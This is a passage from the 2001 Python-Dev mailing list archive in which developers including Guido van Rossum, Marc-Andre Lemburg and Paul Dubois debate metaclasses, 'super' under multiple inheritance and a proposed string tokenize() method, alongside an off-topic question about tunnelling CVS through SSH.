<200105031426.JAA07372@cj20424-a.reston1.va.home.com> > We are actually trying to turn classes into types here :-) Yes! Wait till you see my next batch of checkins. :-) > Really, I think that we could resolve this issue by not inheriting > from meta-classes. DictType is a creation of the meta-class > TypeType. I'm not calling these instances to prevent additional > confusion. The root of the problem is that for some reason there > is belief that DictType should implicitly inherit attributes and > methods from TypeType. If we simply say that there is no implicit > inheritance (only explicit one), then these problems should go > away. Sorry, you still seem to be confused about this. As I tried to explain before, DictType does not *inherit* from TypeType, but it is an *instance* of TypeType. TypeType defines a __repr__() method for all its instances. This is needed so that repr(DictType) returns "". It is *not* inherited from TypeType! If DictType were to inherit from something, it would inherit from the (not yet existing) ObjectType. ObjectType would have a __repr__ method too: it returns "". But this method is overridden by DictType, so doesn't come into play. Requiring explicit inheritance (whatever that may be) won't fix the problem. > Some of these ideas are burried in the "super" part of this > thread. Unfortunately this concept doesn't go very far since > Python has multiple inheritance and thus the term "super" > (referring to the class' single base class) is not well-defined. Not true. While super can't always refer to a single class, the use of super can be completely well-defined in an unambiguous way. Given class D(A, B, C): def foo(self): super.foo(self) "super.foo" is whatever would be called in D1 if we changed the class hierarchy as follows: class D1(A, B, C): pass class D(D1): def foo(self): D1.foo(self) The problem with super is not that it isn't well-defined. Its problem is that it's not enough to do what you want. In some situations involving multiple inheritance, it can be essential to be able to "merge" methods of the sane name defined in each of the base classes, e.g. class C(A, B): def save(self): A.save(self) B.save(self) So we can't use super as an argument to abandon explicitly naming the base class of base methods. Out of the proposed spellings that I can remember: B.save(self) # current Python B.__dict__['save'](self) # ditto, butt ugly B::save(self) # C++ B._.save(self) # Don Beaudry B.instanceMethods.save(self) # ??? I still like current Python best! > As Jim mentioned in his reply to Thomas' question, SmallTalk > has two parallel hierarchies. One for the classes and one for > the meta-classes. If we follow the same path in Python and > keep the two well separated, I think we can resolve many of > the issues which are currently showing up. Yeah, but this is not the path that Python has already taken (and which has been beaten further by Jim Fulton's ExtensionClasses). Python's path is "turtles all the way down". See also my old head-exploding metaclasses paper. > To link the two hierarchies together we don't need a "super" > concept, but instead a way to reach the meta-class in charge > of a class, say "klass.__creator__". Your confusion between the "isInstanceOf" and "isInheritedFrom" relationships seems really deep! Super relates to inheritance. Metaclasses relate to instantiation (of the class, as an instance of the metaclass). > Note that there's another issue hiding in all this and again > this is due to multiple inheritance: which meta-class is in > charge of a class which is derived from two classes having > different meta-classes ? > > meta1 --> o klass1 > o klass1a > o klass1b > meta2 --> o klass2 > o klass2a > o klass2b > > class klass3(klass1a, klass2b): > ... > > I think there's no clean way to resolve this, so I'd suggest > to simply rule this out and declare it illegal (class can > only be based on classes having the same meta-class). Unfortunately, again thanks to Jim Fulton, we can't rule this out, because this is actually used by ExtensionClasses. The rule (as I interpret it) gives the first base class control; if the first base class is a standard class, it looks if any of the other base classes are not standard classes, and if so, gives control to the first such base class. Another way to say this is that the first base class that has a non-standard metaclass gets control. (ExtensionClasses implements an additional rule where it requires all except one of the base classes to define no instance variables. This is an example of the importance of metaclasses done right: the metaclass has control over such issues. I don't think that Smalltalk's metaclasses have this much control -- you pretty much have a 1-1 correspondence between class and metaclass. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 3 16:28:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:28:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200." <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com> > Guido: > > > Actually, I think that what's in the __dict__ is just perfect > > I was thinking of backwards compatibility for people who > are hacking the __dict__ of a class directly. Depending on how they hack it, it may still work. > If you don't care about that, the problem is simpler. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Thu May 3 16:26:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 3 May 2001 09:26:51 -0500 Subject: [Python-Dev] OT: CVS access through firewall via SSH Message-ID: <15089.27307.136251.862692@beluga.mojam.com> Python-dev folks, Sorry for the off-topic post, but I'm striking out on the various other sources I've located so far. Since this group seemed to have a love-hate relationship with CVS for awhile I thought maybe someone here would be able to steer me in the right direction. I have to access a CVS repository through a firewall via SSH. That is, to get to "server" I have to tunnel through "firewall" using SSH to port "nnn". Using SSH to establish an interactive session to server is no problem: ssh -p nnn firewall When I'm inside the firewall, I use a CVSROOT that looks like :pserver:montanaro at server:/cvs/projects I need to merge the two bits somehow to come up with a CVSROOT that will do the tunnel automagically. I've tried this: :pserver:montanaro at firewall:nnn/cvs/projects but CVS complains cvs [update aborted]: connect to firewall:2401 failed: Connection refused (port 2401 is the normal CVS port). Any suggestions or pointers? Thanks, Skip From mal at lemburg.com Thu May 3 18:08:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 18:08:30 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com> Message-ID: <3AF1827E.E730F5DE@lemburg.com> Guido van Rossum wrote: > > > We are actually trying to turn classes into types here :-) > > Yes! Wait till you see my next batch of checkins. :-) Looking forward to them :) BTW, can you give a good starting point into all this (code wise and concept wise) ? I'd like to play around these new concepts a litte to get a beeter feeling for the possible issues (I should have done the same for the coercion stuff a year ago: implementing mxNumber I now find that some important hooks are missing :-(). > > Really, I think that we could resolve this issue by not inheriting > > from meta-classes. DictType is a creation of the meta-class > > TypeType. I'm not calling these instances to prevent additional > > confusion. The root of the problem is that for some reason there > > is belief that DictType should implicitly inherit attributes and > > methods from TypeType. If we simply say that there is no implicit > > inheritance (only explicit one), then these problems should go > > away. > > Sorry, you still seem to be confused about this. I think it has to do with terminology: when I say "inherit" I actually mean "the lookup is forwarded to the another object". In that sense, instances inherit from their classes and classes from their base-classes: meta-class M -> o base-class A o class B o instance x = B() Meta-class M control this "inheritance scheme" and can modify it depending on its needs. Here's a scenario of what I have in mind: In the above picture, say A defines an attribute A.a which is not defined in B or as instance attribute of B(). Querying x.a would then launch this process: 1. x.a -> fails 2. M.__findattr__(x, 'a') is called to find and return the attribute 3. M.__findattr__ asks B for an attribute 'a' -> fails 4. -- " -- asks A -- " -- -> success 5. -- " -- returns the found attribute I know that this is somewhat different under the covers than what's happening now, but the Python programmer will not notice this. It most probably does not work well with the Don Beaudry hook though... so maybe I'm simply on the wrong track here. > As I tried to > explain before, DictType does not *inherit* from TypeType, but it is > an *instance* of TypeType. TypeType defines a __repr__() method for > all its instances. This is needed so that repr(DictType) returns > "". It is *not* inherited from TypeType! > > If DictType were to inherit from something, it would inherit from the > (not yet existing) ObjectType. ObjectType would have a __repr__ > method too: it returns "". > > But this method is overridden by DictType, so doesn't come into play. > > Requiring explicit inheritance (whatever that may be) won't fix the > problem. With "explicit inheritance" I meant that the programmer has to take care of passing the lookup on to the meta-class, rather than applying some magic which hooks together class and meta- class. > > Some of these ideas are burried in the "super" part of this > > thread. Unfortunately this concept doesn't go very far since > > Python has multiple inheritance and thus the term "super" > > (referring to the class' single base class) is not well-defined. > > Not true. While super can't always refer to a single class, the use > of super can be completely well-defined in an unambiguous way. Given > > class D(A, B, C): > def foo(self): > super.foo(self) > > "super.foo" is whatever would be called in D1 if we changed the class > hierarchy as follows: > > class D1(A, B, C): pass > class D(D1): > def foo(self): > D1.foo(self) Nice trick -- much like the "+0" trick in math ;-) > The problem with super is not that it isn't well-defined. Its problem > is that it's not enough to do what you want. In some situations > involving multiple inheritance, it can be essential to be able to > "merge" methods of the sane name defined in each of the base classes, > e.g. > > class C(A, B): > def save(self): > A.save(self) > B.save(self) > > So we can't use super as an argument to abandon explicitly naming the > base class of base methods. Out of the proposed spellings that I can > remember: > > B.save(self) # current Python > B.__dict__['save'](self) # ditto, butt ugly > B::save(self) # C++ > B._.save(self) # Don Beaudry > B.instanceMethods.save(self) # ??? > > I still like current Python best! But it doesn't help us in the very common case of mixin classes since there the method and sometimes even not the programmer will know where the basemethod to call lives. This is why I wrote the basemethod() helper: it looks up the right method at run-time and thus allows writing mixin-classes which override methods of other classes which are only known to the programmer using the mixin and not necessarily to the one writing the mixin. > > As Jim mentioned in his reply to Thomas' question, SmallTalk > > has two parallel hierarchies. One for the classes and one for > > the meta-classes. If we follow the same path in Python and > > keep the two well separated, I think we can resolve many of > > the issues which are currently showing up. > > Yeah, but this is not the path that Python has already taken (and > which has been beaten further by Jim Fulton's ExtensionClasses). > Python's path is "turtles all the way down". See also my old > head-exploding metaclasses paper. I know... I was under the impression, though, that a little breakage under the covers is allowed when moving from type/classes to all types. > > To link the two hierarchies together we don't need a "super" > > concept, but instead a way to reach the meta-class in charge > > of a class, say "klass.__creator__". > > Your confusion between the "isInstanceOf" and "isInheritedFrom" > relationships seems really deep! Super relates to inheritance. > Metaclasses relate to instantiation (of the class, as an instance of > the metaclass). See above... I don't like implicitely binding creation of objects with lookup paths. These two concepts don't belong together, IMHO, since they introduce restrictions which are not really necessary. (I have made some great experience with loosly coupled object systems and don't want to miss their flexibility anymore.) > > Note that there's another issue hiding in all this and again > > this is due to multiple inheritance: which meta-class is in > > charge of a class which is derived from two classes having > > different meta-classes ? > > > > meta1 --> o klass1 > > o klass1a > > o klass1b > > meta2 --> o klass2 > > o klass2a > > o klass2b > > > > class klass3(klass1a, klass2b): > > ... > > > > I think there's no clean way to resolve this, so I'd suggest > > to simply rule this out and declare it illegal (class can > > only be based on classes having the same meta-class). > > Unfortunately, again thanks to Jim Fulton, we can't rule this out, > because this is actually used by ExtensionClasses. The rule (as I > interpret it) gives the first base class control; if the first base > class is a standard class, it looks if any of the other base classes > are not standard classes, and if so, gives control to the first such > base class. Another way to say this is that the first base class that > has a non-standard metaclass gets control. Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't it be possible to adapt ExtensionClass to an altered scheme ? > (ExtensionClasses implements an additional rule where it requires all > except one of the base classes to define no instance variables. This > is an example of the importance of metaclasses done right: the > metaclass has control over such issues. I don't think that > Smalltalk's metaclasses have this much control -- you pretty much have > a 1-1 correspondence between class and metaclass. Right: more power to the meta-class :-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paul at pfdubois.com Thu May 3 18:24:40 2001 From: paul at pfdubois.com (Paul F. Dubois) Date: Thu, 3 May 2001 09:24:40 -0700 Subject: [Python-Dev] Multiple inheritance Message-ID: Pardon if this is brief and suggestive only, I am on deadlines. Super is a mistaken concept in multiple inheritance languages. Fortunately, Python is not brain-damaged. Its multiple inheritance model can be fixed easily to be fully capable. Here is a suggestive example of implementing the Eiffel model (the only one that is theoretically sound) using "pretend" Python syntax (keyword conservationists might like "import" where I have "rename"): 1. The simple case, X inherits from Y and in defining foo and bar needs to use Y's version: class X (Y rename foo as _sfoo, bar as _sbar ): def foo (self): self._sfoo() myfoostuff Suppose D inherits from B and C, which both inherit from A. A has a method a1 that is redefined in B but not in C. D wishes to use both A's version as inherited via C and B's version. class D (B rename a1 as ba1, C rename a1 as ca1): can now use self.ca1, self.a1 Renaming is also useful where you inherit from a utility class and the lingo is different in the class where you want to use it. E.g. class Window (Tree rename children as subWindows) Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. From donb at abinitio.com Thu May 3 18:47:29 2001 From: donb at abinitio.com (Donald Beaudry) Date: Thu, 03 May 2001 12:47:29 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: Message-ID: <200105031647.MAA25803@localhost.localdomain> "Tim Peters" wrote, > Given that we're using Python's search rules, the ambiguous point remaining > is whether: > > super.f() > > textually contained in a method of class K begins searching with: > > 1) K.__bases__ > > or with: > > 2) self.__class__.__bases__ It can only be 1. The using 2 will only be correct if you are in a method defined on a leaf class. If not in a leaf, the search will find the method you are already in... recursion is likely to terminate in a stack overflow ;) -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Thu May 3 20:48:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:48:19 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com> From guido at digicool.com Thu May 3 20:50:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:50:30 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com> > Pardon if this is brief and suggestive only, I am on deadlines. No problem. We appreciate it! > Super is a mistaken concept in multiple inheritance languages. Fortunately, > Python is not brain-damaged. Its multiple inheritance model can be fixed > easily to be fully capable. > > Here is a suggestive example of implementing the Eiffel model (the only one > that is theoretically sound) using "pretend" Python syntax (keyword > conservationists might like "import" where I have "rename"): > > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): > def foo (self): > self._sfoo() > myfoostuff Nice! This is similar to Jeremy's favorite way of spelling "super": class X(Y): Yfoo = Y.foo def foo(self): self.Yfoo() myfoostuff > Suppose D inherits from B and C, which both inherit from A. > A has a method a1 that is redefined in B but not in C. > D wishes to use both A's version as inherited via C and B's version. > > class D (B rename a1 as ba1, C rename a1 as ca1): > > can now use self.ca1, self.a1 > > Renaming is also useful where you inherit from a utility class and the lingo > is different in the class where you want to use it. E.g. class Window (Tree > rename children as subWindows) > > Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. Yes. --Guido van Rossum (home page: http://www.python.org/~guido/) From jepler at inetnebr.com Thu May 3 20:17:16 2001 From: jepler at inetnebr.com (Jeff Epler) Date: Thu, 3 May 2001 13:17:16 -0500 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010503131714.D21814@inetnebr.com> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > class X (Y rename foo as _sfoo, > bar as _sbar > ): Why not let us spell this as: class X(Y): from Y import foo as _sfoo, bar as _sbar ... Of course, then you can spell inheritance as class X: from Y import * Right? :) Jeff From nas at python.ca Thu May 3 21:05:37 2001 From: nas at python.ca (Neil Schemenauer) Date: Thu, 3 May 2001 12:05:37 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500 References: <20010503131714.D21814@inetnebr.com> Message-ID: <20010503120537.A13708@glacier.fnational.com> Jeff Epler wrote: > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): > > Why not let us spell this as: > class X(Y): > from Y import foo as _sfoo, bar as _sbar > ... This already has a meaning in Python. Paul's suggested syntax is pretty neat, IMHO. Neil From trentm at ActiveState.com Thu May 3 21:39:27 2001 From: trentm at ActiveState.com (Trent Mick) Date: Thu, 3 May 2001 12:39:27 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700 References: <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com> Message-ID: <20010503123927.B30837@ActiveState.com> On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote: > Jeff Epler wrote: > > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > > class X (Y rename foo as _sfoo, > > > bar as _sbar > > > ): > > > > Why not let us spell this as: > > class X(Y): > > from Y import foo as _sfoo, bar as _sbar > > ... > > This already has a meaning in Python. Paul's suggested syntax is > pretty neat, IMHO. Ditto but how to you separate the "rename" lists for multiple inheritance? class X (Y rename foo as _sfoo, bar as _sbar; Z): pass ^---- what to use here How about: class X(Y, Z): from Y inherit foo as _yfoo, bar as _ybar from Z inherit foo as _zfoo, bar as _zbar Hmmmmm. Don't know if I like that either. Just throwing out ideas. Trent -- Trent Mick TrentM at ActiveState.com From greg at cosc.canterbury.ac.nz Fri May 4 06:25:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:25:08 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF1827E.E730F5DE@lemburg.com> Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I think it has to do with terminology: when I say "inherit" > I actually mean "the lookup is forwarded to the another object". Some OO languages munge together the instance and inheritance relationships, but Python isn't one of them. Using terminology that way in the context of Python is guaranteed to cause massive confusion! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Fri May 4 06:58:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:58:20 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz> pf at artcom-gmbh.de (Peter Funk): > * People will confuse this with calling > MyBaseClass.__getitem__(....) Given type/class/instance unification, that's exactly how it'll be implemented. So it's not confusion, it's insightful understanding! > This '::' operator is not at all that ugly Well, that's a matter of opinion. But I'll concede that it's less ugly than something like @ or $. But in any case, it's not going to mean quite the same thing in Python as it does in C++, so it might just confuse C++ people. What exactly *is* it going to mean in Python, anyway? Will it have a corresponding __magic__ method, and if so, what will it be called? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Fri May 4 10:40:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 10:40:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> Message-ID: <3AF26AF1.780462E2@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I think it has to do with terminology: when I say "inherit" > > I actually mean "the lookup is forwarded to the another object". > > Some OO languages munge together the instance and inheritance > relationships, but Python isn't one of them. Using terminology > that way in the context of Python is guaranteed to cause > massive confusion! But that's exactly what I am trying to do here: separate the notion of how lookups work (inheritance) from how objects are created (instantiation) ! In Python instantiation binds the new object to the creating class and all failing lookups are directed from the object to the class. OTOH, the class - base-class lookup relationship doesn't have anything to do creation of objects -- classes are simply bound to their base-classes per definition of the class in the sense that failing lookups are directed to the base-classes. Classes themselves are created by meta-classes. The lookup strategy between the two is defined by the meta-class. What I'm argueing for is that meta-classes should get complete control over how lookups and object creation are done. However, this will only be possible by breaking the current automatic lookup scheme at the meta-class - class boundary since otherwise you'd run into endless loops during lookups (e.g. for many of the __xxx__ methods). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 4 11:04:08 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 11:04:08 +0200 Subject: [Python-Dev] "".tokenize() ? Message-ID: <3AF27088.DE495210@lemburg.com> Gustavo Niemeyer submitted a patch which adds a tokenize like method to strings and Unicode: "one, two and three".tokenize([",", "and"]) -> ["one", " two ", "three"] I like this method -- should I review the code and then check it in ? PS: Haven't gotten any response regarding the .decode() method yet... should I take this as "no objections" ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 11:57:19 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 11:57:19 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff> mal wrote: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1. method bloat. not exactly something you do every day, and when you do, it's a one-liner: def tokenize(string, ignore): [word for word in re.findall("\w+", string) if not word in ignore] > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? -0. method bloat. we don't have asfloat methods on integers and asint methods on strings either... Cheers /F From mal at lemburg.com Fri May 4 12:16:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 12:16:16 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> Message-ID: <3AF28170.399C2A5@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1. method bloat. not exactly something you do every day, and > when you do, it's a one-liner: > > def tokenize(string, ignore): > [word for word in re.findall("\w+", string) if not word in ignore] This is not the same as what .tokenize() does: it cut at each occurrance of a substring rather than words as in your example (although I must say that list comprehension looks cool ;-). > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > -0. method bloat. we don't have asfloat methods on integers and > asint methods on strings either... Well, we already have .encode() which interfaces to PyString_Encode(), but no Python API for getting at PyString_Decode(). This is what .decode() is for. Depending on the codecs you use, these two methods can be very useful, e.g. for "fixing" line-endings or hexifying strings. The codec concept can be used for far more applications than just converting from and to Unicode. About rich method APIs in general: I like having rich method APIs, since they make life easier (you don't have to reinvent the wheel everytime you want a common job to be done). IMHO, too many methods can never hurt, but I'm probably alone with that POV. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 12:50:06 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 12:50:06 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com> Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff> mal wrote: > > > "one, two and three".tokenize([",", "and"]) > > > -> ["one", " two ", "three"] > > > > > > I like this method -- should I review the code and then check it in ? > > > > -1. method bloat. not exactly something you do every day, and > > when you do, it's a one-liner: > > > > def tokenize(string, ignore): > > [word for word in re.findall("\w+", string) if not word in ignore] > > This is not the same as what .tokenize() does: it cut at each > occurrance of a substring rather than words as in your example oh, I didn't see the spaces. splitting on all substrings is even easier (but perhaps a bit more obscure, at least when written on one line): def tokenize(string, seps): return re.split("|".join(map(re.escape, seps)), string) Cheers /F From lkcl at samba-tng.org Fri May 4 13:31:29 2001 From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton) Date: Fri, 4 May 2001 13:31:29 +0200 Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn] Message-ID: <20010504133129.K26116@angua.rince.de> hi there, i thought it best to bring this to someone's attention. the forkingmixin code keeps track of its children, plus because it forks, there's no close_requests() to interfere with the operation of the child etc. etc. now, for some marginally bizarre reason, adding an extra base class - BaseServer - has, i believe (without proof, just a hunch), caused a bug in ThreadingMixIn to be more likely to occur. now, i wrote BaseServer in order to be able to overload this for a server that reads from a SQL server table and performs actions based on what it reads from there (the name of a host and the name of a python script to action on the host, from the database :) :) ... but i don't do threading. python is my first actual exposure to thread programming. does anyone have enough experience with threads to write something in less lines and less time than this message? all best, luke ----- Forwarded message from noreply at sourceforge.net ----- Delivered-To: lkcl at angua.rince.de Delivered-To: lkcl at samba.org To: noreply at sourceforge.net From: noreply at sourceforge.net Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn Date: Thu, 03 May 2001 16:26:12 -0700 Bugs item #417845, was updated on 2001-04-21 08:28 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470 Category: Python Library Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Guido van Rossum (gvanrossum) Summary: Python 2.1: SocketServer.ThreadingMixIn Initial Comment: SocketServer.ThreadingMixIn does not work properly since it tries to close the socket of a request two times. From gward at python.net Fri May 4 20:12:44 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:12:44 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010504141244.A1167@gerg.ca> On 03 May 2001, Paul F. Dubois said: > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): Maybe I'm being thick, but don't you get the same effect by doing this: class X (Y): _sfoo = Y.foo _sbar = Y.bar ...or would the "rename" syntax also hide the "foo" and "bar" names from X's effective namespace[1]? In that case, I guess some special syntax is needed. [1] "effective namespace" -- the union of X's class dict with all its superclass' dicts; not actually X's namespace, but the set of names you can use in X. I think. Err, whatever. Greg From gward at python.net Fri May 4 20:15:51 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:15:51 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200 References: <3AF27088.DE495210@lemburg.com> Message-ID: <20010504141551.B1167@gerg.ca> On 04 May 2001, M.-A. Lemburg said: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? I concur with /F: -1 because you can do it easily with re.split(). Greg -- Greg Ward - Unix bigot gward at python.net http://starship.python.net/~gward/ I hope something GOOD came in the mail today so I have a REASON to live!! From guido at digicool.com Fri May 4 20:36:14 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:36:14 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT." <20010504141244.A1167@gerg.ca> References: <20010504141244.A1167@gerg.ca> Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com> > On 03 May 2001, Paul F. Dubois said: > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > > use Y's version: > > > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): [Greg Ward] > Maybe I'm being thick, but don't you get the same effect by doing this: > > class X (Y): > _sfoo = Y.foo > _sbar = Y.bar > > ...or would the "rename" syntax also hide the "foo" and "bar" names from > X's effective namespace[1]? In that case, I guess some special syntax > is needed. Paul's point is that the rename thing makes it possible to deprecate the form Y.foo, which is causing the basic ambiguity here. > [1] "effective namespace" -- the union of X's class dict with all its > superclass' dicts; not actually X's namespace, but the set of names you > can use in X. I think. Err, whatever. Probably irrelevant. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 4 20:38:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:38:06 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT." <20010504141551.B1167@gerg.ca> References: <3AF27088.DE495210@lemburg.com> <20010504141551.B1167@gerg.ca> Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com> > On 04 May 2001, M.-A. Lemburg said: > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > I concur with /F: -1 because you can do it easily with re.split(). -1 also. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 20:51:26 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 14:51:26 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com> Message-ID: [MAL] > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1 here. Easily enough done via other means, and you just *know* different people will want different variants of tokenization (e.g., nobody in their right mind will want " two " coming back from that example, and, given that it does, that it doesn't also return " three" is baffling). > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? +1 from me: it's the other half of the existing .encode() method, and the current lack of symmetry is icky. From barry at digicool.com Fri May 4 20:57:09 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Fri, 4 May 2001 14:57:09 -0400 Subject: [Python-Dev] Multiple inheritance References: <20010503131714.D21814@inetnebr.com> Message-ID: <15090.64389.746625.331215@anthem.wooz.org> >>>>> "JE" == Jeff Epler writes: >> class X (Y rename foo as _sfoo, bar as _sbar ): | Why not let us spell this as: | class X(Y): | from Y import foo as _sfoo, bar as _sbar | ... >>>>> "NS" == Neil Schemenauer writes: NS> This already has a meaning in Python. Paul's suggested syntax NS> is pretty neat, IMHO. Not if Y is a class though, right? That would currently 